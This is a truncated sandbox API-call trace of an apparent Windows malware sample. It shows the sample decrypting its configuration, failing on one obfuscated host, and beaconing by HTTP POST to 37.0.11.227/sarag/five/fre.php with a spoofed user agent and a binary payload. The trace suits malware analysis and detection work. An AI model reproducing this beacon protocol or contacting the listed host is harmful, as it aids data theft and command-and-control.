[0188.800] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0188.801] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9cd0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeaa8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0188.801] GetProcessHeap () returned 0x690000 [0188.801] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab450 [0188.801] socket (af=2, type=1, protocol=6) returned 0x368 [0188.801] connect (s=0x368, name=0x6aeaa8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0188.827] FreeAddrInfoW (pAddrInfo=0x6a9cd0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeaa8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0188.827] GetProcessHeap () returned 0x690000 [0188.827] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0188.828] GetProcessHeap () returned 0x690000 [0188.828] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0188.828] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0188.829] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0188.829] GetProcessHeap () returned 0x690000 [0188.829] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0188.829] GetProcessHeap () returned 0x690000 [0188.829] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0188.830] GetProcessHeap () returned 0x690000 [0188.830] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0188.830] GetProcessHeap () returned 0x690000 [0188.830] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0188.830] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0188.831] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0188.831] GetProcessHeap () returned 0x690000 [0188.831] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0188.831] GetProcessHeap () returned 0x690000 [0188.831] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0188.831] send (s=0x368, buf=0x6abd08*, len=242, flags=0) returned 242 [0188.832] send (s=0x368, buf=0x6aba40*, len=159, flags=0) returned 159 [0188.832] GetProcessHeap () returned 0x690000 [0188.832] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0188.832] recv (in: s=0x368, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0188.926] GetProcessHeap () returned 0x690000 [0188.927] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0188.927] GetProcessHeap () returned 0x690000 [0188.927] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0188.927] GetProcessHeap () returned 0x690000 [0188.927] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0188.927] GetProcessHeap () returned 0x690000 [0188.928] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0188.928] closesocket (s=0x368) returned 0 [0188.929] GetProcessHeap () returned 0x690000 [0188.929] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab450 | out: hHeap=0x690000) returned 1 [0188.929] GetProcessHeap () returned 0x690000 [0188.929] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0188.929] GetProcessHeap () returned 0x690000 [0188.930] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0188.930] GetProcessHeap () returned 0x690000 [0188.930] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0188.930] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x810) returned 0x368 [0188.934] Sleep (dwMilliseconds=0xea60) [0188.935] GetProcessHeap () returned 0x690000 [0188.935] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0188.939] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.940] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0188.946] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.947] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0188.956] GetProcessHeap () returned 0x690000 [0188.956] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0188.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.962] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0188.963] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.964] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0188.964] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.965] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0188.965] GetProcessHeap () returned 0x690000 [0188.965] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0188.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.966] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0188.967] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.967] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0188.968] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.968] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0188.968] GetProcessHeap () returned 0x690000 [0188.968] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0188.971] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.972] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0188.972] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.972] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0188.973] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.973] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0188.974] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.974] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0188.974] GetProcessHeap () returned 0x690000 [0188.974] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0188.974] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0188.975] GetProcessHeap () returned 0x690000 [0188.976] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0188.976] GetProcessHeap () returned 0x690000 [0188.976] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0188.977] GetProcessHeap () returned 0x690000 [0188.977] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0188.977] GetProcessHeap () returned 0x690000 [0188.977] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0188.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.978] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0188.985] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.986] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0188.995] GetProcessHeap () returned 0x690000 [0188.995] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0188.996] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.997] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0188.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.998] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0188.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.999] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0188.999] GetProcessHeap () returned 0x690000 [0189.000] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0189.000] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.001] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0189.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.004] CryptDestroyKey (hKey=0x69d628) returned 1 [0189.005] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.006] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0189.006] GetProcessHeap () returned 0x690000 [0189.006] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0189.007] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.007] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0189.008] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.008] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0189.009] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.009] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0189.010] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.011] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0189.011] GetProcessHeap () returned 0x690000 [0189.011] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0189.011] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9d70*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae970*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0189.011] GetProcessHeap () returned 0x690000 [0189.011] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab320 [0189.011] socket (af=2, type=1, protocol=6) returned 0x36c [0189.011] connect (s=0x36c, name=0x6ae970*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0189.038] FreeAddrInfoW (pAddrInfo=0x6a9d70*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae970*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0189.038] GetProcessHeap () returned 0x690000 [0189.038] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0189.038] GetProcessHeap () returned 0x690000 [0189.038] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0189.039] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0189.040] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0189.040] GetProcessHeap () returned 0x690000 [0189.040] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0189.040] GetProcessHeap () returned 0x690000 [0189.041] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0189.041] GetProcessHeap () returned 0x690000 [0189.041] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0189.041] GetProcessHeap () returned 0x690000 [0189.041] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0189.042] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0189.043] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0189.043] GetProcessHeap () returned 0x690000 [0189.043] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0189.043] GetProcessHeap () returned 0x690000 [0189.044] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0189.044] send (s=0x36c, buf=0x6abd08*, len=242, flags=0) returned 242 [0189.044] send (s=0x36c, buf=0x6aba40*, len=159, flags=0) returned 159 [0189.045] GetProcessHeap () returned 0x690000 [0189.045] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0189.045] recv (in: s=0x36c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0189.154] GetProcessHeap () returned 0x690000 [0189.155] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0189.155] GetProcessHeap () returned 0x690000 [0189.155] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0189.155] GetProcessHeap () returned 0x690000 [0189.155] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0189.155] GetProcessHeap () returned 0x690000 [0189.156] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0189.156] closesocket (s=0x36c) returned 0 [0189.159] GetProcessHeap () returned 0x690000 [0189.163] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab320 | out: hHeap=0x690000) returned 1 [0189.163] GetProcessHeap () returned 0x690000 [0189.164] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0189.164] GetProcessHeap () returned 0x690000 [0189.164] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0189.164] GetProcessHeap () returned 0x690000 [0189.164] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0189.165] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x10e0) returned 0x36c [0189.167] Sleep (dwMilliseconds=0xea60) [0189.168] GetProcessHeap () returned 0x690000 [0189.168] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0189.170] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.170] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0189.178] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.178] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0189.188] GetProcessHeap () returned 0x690000 [0189.188] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0189.189] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.190] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0189.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.190] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0189.191] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.191] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0189.191] GetProcessHeap () returned 0x690000 [0189.192] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0189.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.193] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0189.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.194] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0189.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.195] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0189.195] GetProcessHeap () returned 0x690000 [0189.195] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0189.213] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.214] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0189.214] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.215] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0189.215] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.215] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0189.218] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.218] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0189.218] GetProcessHeap () returned 0x690000 [0189.218] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0189.218] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0189.218] GetProcessHeap () returned 0x690000 [0189.219] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0189.219] GetProcessHeap () returned 0x690000 [0189.220] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0189.220] GetProcessHeap () returned 0x690000 [0189.221] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0189.221] GetProcessHeap () returned 0x690000 [0189.221] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0189.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.221] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0189.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.227] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0189.242] GetProcessHeap () returned 0x690000 [0189.242] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0189.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.243] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0189.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.244] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0189.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.244] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0189.244] GetProcessHeap () returned 0x690000 [0189.245] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0189.246] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.246] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0189.246] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.247] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0189.247] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.247] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0189.247] GetProcessHeap () returned 0x690000 [0189.247] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0189.248] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.248] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0189.249] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.249] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0189.250] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.250] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0189.251] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.251] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0189.251] GetProcessHeap () returned 0x690000 [0189.251] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0189.251] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9f28*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea48*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0189.251] GetProcessHeap () returned 0x690000 [0189.251] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0189.251] socket (af=2, type=1, protocol=6) returned 0x370 [0189.252] connect (s=0x370, name=0x6aea48*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0189.280] FreeAddrInfoW (pAddrInfo=0x6a9f28*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea48*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0189.280] GetProcessHeap () returned 0x690000 [0189.280] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, 